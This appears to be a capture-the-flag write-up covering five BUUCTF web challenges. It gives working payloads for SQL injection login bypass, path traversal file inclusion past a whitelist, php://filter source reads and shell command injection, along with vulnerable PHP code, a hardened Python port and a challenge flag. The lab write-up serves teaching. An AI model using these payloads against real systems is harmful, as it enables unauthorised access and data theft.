BUUCTF Notes (web)
2022-08-10 06:35:00 【Qing, Jiu Gu Huan ゞ】
1. [极客大挑战 2019]EasySQL1
Once in, we try logging in to the website.
We can see that the form is submitted as a GET request, so we try a bypass directly:
?username=admin' or '1'='1&password=123' or '1'='1
The ' closes the original SQL string, and the appended or '1'='1 turns the query into an always-true ("universal") statement.
2. [HCTF 2018]WarmUp1
We are given an image; pressing F12 or Ctrl+U shows a hidden part of the page that mentions source.php.
So we append /source.php to the URL.
Then comes the code audit.
<?php
highlight_file(__FILE__);
class emmm
{
    public static function checkFile(&$page)
    {
        // whitelist
        $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
        // check that it is a string; if not, return an error
        if (! isset($page) || !is_string($page)) {
            echo "you can't see it";
            return false;
        }
        // first check: compare the value passed in with the whitelist, return true if it is there
        if (in_array($page, $whitelist)) {
            return true;
        }
        // first filter: keep only the part before the first '?'
        $_page = mb_substr(
            $page,
            0,
            mb_strpos($page . '?', '?')
        );
        // check again whether the truncated value is in the whitelist
        if (in_array($_page, $whitelist)) {
            return true;
        }
        // URL-decode page, then repeat the truncation and the whitelist check
        $_page = urldecode($page);
        $_page = mb_substr(
            $_page,
            0,
            mb_strpos($_page . '?', '?')
        );
        if (in_array($_page, $whitelist)) {
            return true;
        }
        echo "you can't see it";
        return false;
    }
}
if (! empty($_REQUEST['file'])
    && is_string($_REQUEST['file'])
    && emmm::checkFile($_REQUEST['file'])
) {
    include $_REQUEST['file'];
    exit;
} else {
    echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
}
?>
Look first at the if at the bottom: if the passed file parameter is not empty, is a string, and gets through the checkFile filter above, the file is included.
So we append hint.php to the URL and take a look.
It tells us the flag is in the file ffffllllaaaagggg, so we change the URL to
/index.php?file=hint.php?../../../../../ffffllllaaaagggg
The part before /index is the address of your lab instance (index here can also be replaced with hint or source; the original code is then simply displayed).
Let's analyze it: after the value is passed in, the string after file= is checked first; it is not empty and it is a string, so the string is then passed to page for the checks above.
At the start it is hint.php?../../../../../ffffllllaaaagggg, so the first check (exact match) fails. Then the first filter runs: after filtering, _page is hint.php, which is in the whitelist, so the check passes and the file inclusion is executed. The ../ sequences after it are used to reach the file; since I don't know which directory it is in, I try them one at a time.
Finally we get the flag.
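To make the checkFile() logic above concrete, here is a Python port of its three-step whitelist check next to a strict variant that only accepts an exact whitelist entry. This is an added example, not the challenge's own code; the whitelist values are the ones from the PHP above, and the function names are my own.

```python
from typing import Callable, Optional
from urllib.parse import unquote

# Python port of the page's checkFile() whitelist logic (added example,
# not the challenge's own code). Whitelist values come from the PHP above.
WHITELIST = {"source": "source.php", "hint": "hint.php"}


def _before_first_qmark(s: str) -> str:
    # Same as mb_substr($s, 0, mb_strpos($s . '?', '?')): if there is no '?'
    # the whole string is kept, otherwise only the part before the first '?'.
    return s.split("?", 1)[0]


def check_file_original(page) -> bool:
    """The three checks from the page, in order: exact match, truncate at
    '?', then urldecode and truncate again. Only the *truncated* value is
    compared, while include receives the untouched value."""
    if not isinstance(page, str):
        return False
    if page in WHITELIST.values():
        return True
    if _before_first_qmark(page) in WHITELIST.values():
        return True
    return _before_first_qmark(unquote(page)) in WHITELIST.values()


def check_file_hardened(page) -> bool:
    """Hardened variant: the value that would be included is compared as-is
    against the whitelist, so no truncation or decoding can make them differ."""
    return isinstance(page, str) and page in WHITELIST.values()


def resolve_include(page, checker: Callable[[str], bool]) -> Optional[str]:
    """Mimic the bottom of the page's script: return the string that would be
    handed to include, or None when the request is rejected."""
    if not page or not isinstance(page, str) or not checker(page):
        return None
    return page  # the full, un-truncated value is what gets included
```

Running both checkers over the page's payload shows the root cause: the original accepts it because the string before the first '?' is hint.php, yet include() is handed the whole string; the hardened version rejects anything that is not literally a whitelisted file.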
3. [极客大挑战 2019]Havefun1
This one is very simple. After entering, you can see some code hidden in the page source,
so we directly pass a cat parameter with the value dog.
4. [ACTF2020 新生赛]Include1
When you go in you see a "tips" link; clicking it, you can see that the URL changes, and it hints that this is solved with file inclusion using the php:// pseudo-protocol (wrapper):
file=php://filter/read=convert.base64-encode/resource=flag.php
Then base64-decode the output:
flag{ef7e62e5-5ed4-4f53-8c7c-fb80aaabf7cc}
If you don't understand, you can read these two articles:
PHP pseudo-protocols (file inclusion) - 番茄酱料's blog - CSDN
[ACTF2020 新生赛]Include 1 - wow小华's blog - CSDN
5. [ACTF2020 新生赛]Exec1
An obvious command injection vulnerability.
Common web attacks: command injection - 简书 (jianshu.com)
Command injection - extremebingo's blog - CSDN
Directly enter 127.0.0.1;ls. The address in front is your own local address; the ls after it lists the directory so we can find where the flag file is.
Nothing there, so look one level up with 127.0.0.1;cd ../;ls. Here cd changes directory and ls lists the current directory.
Continuing up to 127.0.0.1;cd ../../../;ls, we see flag.
Then 127.0.0.1;cd ../../../;cat flag outputs its contents.